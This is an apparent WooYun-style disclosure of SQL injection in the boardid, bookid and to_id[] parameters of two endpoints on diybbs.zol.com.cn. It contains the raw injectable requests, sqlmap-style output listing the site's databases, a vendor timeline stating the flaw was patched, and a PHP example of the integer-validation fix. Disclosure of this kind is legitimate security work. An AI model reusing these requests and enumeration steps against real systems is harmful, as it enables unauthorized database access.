2015-03-03: Details have been sent to the vendor and are awaiting the vendor's handling.
2015-03-03: The vendor has confirmed the issue; details are disclosed to the vendor only.
2015-03-03: The vendor has fixed the vulnerability and disclosed it proactively; details are now public.

SQL injection in the site parameters boardid and bookid
GET /ajax/book2014/get_new_message.php?boardid=231&bookid=749985&replys=207&pingfenNum=2&t=142522087 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://diybbs.zol.com.cn/75/231_749985.html?via=handWorkClick
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: diybbs.zol.com.cn
Accept-Encoding: gzip, deflate

[09:10:42] [INFO] fetching database names
[09:10:42] [INFO] fetching number of databases
[09:10:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:10:42] [INFO] retrieved: 11
current user: '[email protected]%'
available databases [11]:
[*] information_schema
[*] mysql
[*] test
[*] z_diybbs
[*] z_gigabyte
[*] z_gpsbbs
[*] z_lepad
[*] z_lephone
[*] z_oabbs
[*] z_postbbs
[*] z_techbb
Additionally: the to_id[] array parameter (sent as to_id%5B%5D) is also injectable.

GET /ajax/book2013/get_replynum.php?boardid=198&bookid=128883&to_id%5B%5D=924998 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://diybbs.zol.com.cn/13/198_128883.html?via=handWorkClick
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: diybbs.zol.com.cn
Accept-Encoding: gzip, deflate
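The fix for all three parameters is the same: validate each value as an integer and bind it, treating the to_id[] array element by element rather than as a string. The following is an added example of such a handler, not the site's own code; the table name, column names, database credentials and the mapping of this endpoint to the z_diybbs database are assumptions.

```php
<?php
// Added example (not the site's code): boardid, bookid and to_id[] handled
// with strict integer validation and bound parameters.
// Table/column names and DB credentials below are assumptions.

function requirePositiveInt(array $src, string $name): int {
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer
    // (e.g. "749985 OR 1=1", or a nested array); min_range rejects 0 and negatives.
    $v = filter_var($src[$name] ?? null, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 1]]);
    if ($v === false) {
        http_response_code(400);
        exit(json_encode(['error' => "invalid $name"]));
    }
    return $v;
}

function requireIntList(array $src, string $name, int $max = 50): array {
    // to_id[] arrives as a PHP array: check it is one, bound its size,
    // then validate every element individually.
    $raw = $src[$name] ?? null;
    if (!is_array($raw) || $raw === [] || count($raw) > $max) {
        http_response_code(400);
        exit(json_encode(['error' => "invalid $name"]));
    }
    return array_map(fn($x) => requirePositiveInt([$name => $x], $name), $raw);
}

$boardId = requirePositiveInt($_GET, 'boardid');
$bookId  = requirePositiveInt($_GET, 'bookid');
$toIds   = requireIntList($_GET, 'to_id');

$pdo = new PDO('mysql:host=127.0.0.1;dbname=z_diybbs;charset=utf8mb4', 'app_user', 'app_pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // server-side prepares, no client-side interpolation
]);

// One "?" per list element; the values are bound, so the IN (...) list
// can only ever contain the validated integers.
$placeholders = implode(',', array_fill(0, count($toIds), '?'));
$stmt = $pdo->prepare(
    "SELECT reply_id, COUNT(*) AS n FROM book_message
      WHERE board_id = ? AND book_id = ? AND reply_id IN ($placeholders)
      GROUP BY reply_id"
);
$stmt->execute(array_merge([$boardId, $bookId], $toIds));
header('Content-Type: application/json');
echo json_encode($stmt->fetchAll(PDO::FETCH_ASSOC));
```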
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-03-03 09:48
Thanks to "Forever80s"; the vulnerability has been patched. WooYun is better with you~~
2015-03-03: Thanks to "Forever80s"; the vulnerability has been patched. WooYun is better with you~~
2015-03-03: Vulnerability patched.